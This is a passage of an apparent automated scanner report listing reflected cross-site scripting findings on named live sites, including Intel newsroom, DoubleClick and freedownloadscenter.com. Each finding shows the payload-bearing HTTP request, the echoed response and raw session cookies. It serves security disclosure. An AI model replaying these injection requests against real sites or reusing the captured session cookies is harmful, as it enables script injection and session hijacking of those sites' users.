Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.3.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947627821; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; 
s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:35 GMT
Server: Apache
X-JAL: 459
Content-Language: en-US
CacheHit: D=461129 t=1296947675093028
X-JSL: D=461135 t=1296947675093028
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large">

<!-- Parameters that have to be defined before including this ftl-->
<!-- tagSets is a collection of TagSet-->
<!-- Specialize ContentFilterHandler if there is a
...[SNIP]...
idPrefix: '7llQwie736f%3Balert(1)%2F%2Fc5ce5e171d4'
}, false);
if (typeof(ContentFilterHandler_7llQwie736f;alert(1)//c5ce5e171d4) != 'undefined') {
ContentFilterHandler_7llQwie736f;alert(1)//c5ce5e171d4.contentLoader = pager;
}
});


if (typeof(ContentFilte
...[SNIP]...

4.10. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The value of the idPrefix request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c39a"><script>alert(1)</script>af3c9d8300 was submitted in the idPrefix parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwi3c39a"><script>alert(1)</script>af3c9d8300&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.3.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947627821; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; 
s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:13:33 GMT
Server: Apache
X-JAL: 309
Content-Language: en-US
CacheHit: D=311516 t=1296947613247827
X-JSL: D=311521 t=1296947613247827
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large">

<!-- Parameters that have to be defined before including this ftl-->
<!-- tagSets is a collection of TagSet-->
<!-- Specialize ContentFilterHandler if there is a
...[SNIP]...
<div class="jive-widget-filter jive-content-filter widgetclass_7llQwi3c39a"><script>alert(1)</script>af3c9d8300 clearfix">
...[SNIP]...

4.11. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The value of the idPrefix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cd3a"%3balert(1)//4691b8f75cd was submitted in the idPrefix parameter. This input was echoed as 4cd3a";alert(1)//4691b8f75cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwi4cd3a"%3balert(1)//4691b8f75cd&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.3.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947627821; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; 
s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:13:52 GMT
Server: Apache
X-JAL: 344
Content-Language: en-US
CacheHit: D=346411 t=1296947632747487
X-JSL: D=346417 t=1296947632747487
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large">

<!-- Parameters that have to be defined before including this ftl-->
<!-- tagSets is a collection of TagSet-->
<!-- Specialize ContentFilterHandler if there is a
...[SNIP]...
ontent-content-block-container_7llQwi4cd3a";alert(1)//4691b8f75cd'),
"/render-widget!execute.jspa #jive-recentcontent-content-block-container_7llQwi4cd3a";alert(1)//4691b8f75cd",
{
frameID: parsedFrameID,
widge
...[SNIP]...

4.12. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 488f2<script>alert(1)</script>c924c785a0a was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1296956995929&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BOVAw%2C&cids=VxBQkM%2C&pstok=b8HFZCHCK-UKDgoKCIOqThDDhIXiFRAACgA&client=ca-pub-5783553522579509&slotname=Tile2_RightCol488f2<script>alert(1)</script>c924c785a0a&page_slots=CenterCol_Tile1%2CTile1_RightCol%2CTile2_RightCol&cust_params=Site%3DHA&cookie=ID%3D9c79886a0efcbf70%3AT%3D1296942810%3AS%3DALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig&ga_vid=1785005893.1296942825&ga_sid=1296956996&ga_hid=1372920090&ga_fc=true&url=http%3A%2F%2Fhomeappliance.manualsonline.com%2Fex%2Fmfg%2Fheadline%2Fm%2Fariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281%2Fd%2Ftype%2Fproduct_problem&ref=http%3A%2F%2Fburp%2Fshow%2F1&lmt=1296978611&dt=1296957011025&cc=11&biw=969&bih=996&ifi=3&adk=1414079277&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 06 Feb 2011 01:56:13 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1304

GA_googleSetAdContentsBySlotForSync({"Tile2_RightCol488f2<script>alert(1)</script>c924c785a0a":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

4.13. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /mybeta/Search/newsearch.php3

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 2c0d9<script>alert(1)</script>9e325663c1f was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mybeta/Search/newsearch.php3?q=32c0d9<script>alert(1)</script>9e325663c1f&Category=(select HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:30:06 GMT
Content-Type: text/html
Connection: close
Keep-Alive: timeout=15, max=500
Content-Length: 25829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
<title>Free 32c0d9<script>alert(1)</script>9e325663c1f downloads</title>
...[SNIP]...
<div class="descript">
e.g. 32c0d9<script>alert(1)</script>9e325663c1f</div>
...[SNIP]...

4.14. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /mybeta/Search/newsearch.php3

Issue detail

The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload c6f32</title><script>alert(1)</script>2663608f414 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mybeta/Search/newsearch.php3?q=3c6f32</title><script>alert(1)</script>2663608f414&Category=(select HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:30:08 GMT
Content-Type: text/html
Connection: close
Keep-Alive: timeout=15, max=500
Content-Length: 26021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
<title>Free 3c6f32</title><script>alert(1)</script>2663608f414 downloads</title>
...[SNIP]...

4.15. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /mybeta/Search/newsearch.php3

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4467d"><script>alert(1)</script>8eb7829c8dc was submitted in the q parameter. This input was echoed as 4467d\"><script>alert(1)</script>8eb7829c8dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mybeta/Search/newsearch.php3?q=34467d"><script>alert(1)</script>8eb7829c8dc&Category=(select HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:30:05 GMT
Content-Type: text/html
Connection: close
Keep-Alive: timeout=15, max=500
Content-Length: 25901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
<title>Free 34467d\"><script>alert(1)</script>8eb7829c8dc downloads</tit
...[SNIP]...
<META name="description" content="Free 34467d\"><script>alert(1)</script>8eb7829c8dc downloads">
...[SNIP]...

4.16. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://appdeveloper.intel.com
Path:   /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 865a4"-alert(1)-"ce65034e0f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=865a4"-alert(1)-"ce65034e0f1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 23:18:20 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=38574e65cbb57f2b899725d71389c0ab; expires=Tue, 01-Mar-2011 02:51:40 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:18:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
ustom24 = "";
                   var wa_eCustom28="http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml";
                   
                   var wa_custom11="http://www.google.com/search?hl=en&q=865a4"-alert(1)-"ce65034e0f1";
                   
                   
                                       var wa_urlQueryString="";
                   var wa_reportSuites="intelappdeveloper,intelcorpsw";
                   var wa_trackDFA="n";
                   
               </script>
...[SNIP]...

4.17. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edeec"style%3d"x%3aexpression(alert(1))"e9cdcf08be6 was submitted in the REST URL parameter 10. This input was echoed as edeec"style="x:expression(alert(1))"e9cdcf08be6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style%3d"x%3aexpression(alert(1))"e9cdcf08be6 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style="x:expression(alert(1))"e9cdcf08be6?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style="x:expression(alert(1))"e9cdcf08be6?cid=rss-182178-c1-264110">
...[SNIP]...

4.18. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b7ba"style%3d"x%3aexpression(alert(1))"c49e060793 was submitted in the REST URL parameter 2. This input was echoed as 2b7ba"style="x:expression(alert(1))"c49e060793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-2641102b7ba"style%3d"x%3aexpression(alert(1))"c49e060793/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:02 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-2641102b7ba"style="x:expression(alert(1))"c49e060793
Content-Length: 235
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-2641102b7ba"style="x:expression(alert(1))"c49e060793">
...[SNIP]...

4.19. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74ef"style%3d"x%3aexpression(alert(1))"4e7c6c9736f was submitted in the REST URL parameter 3. This input was echoed as f74ef"style="x:expression(alert(1))"4e7c6c9736f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.comf74ef"style%3d"x%3aexpression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:07 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.comf74ef"style="x:expression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations
Content-Length: 211
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.comf74ef"style="x:expression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations">
...[SNIP]...

4.20. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c60"style%3d"x%3aexpression(alert(1))"f7e517be872 was submitted in the REST URL parameter 4. This input was echoed as a3c60"style="x:expression(alert(1))"f7e517be872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/communitya3c60"style%3d"x%3aexpression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:12 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
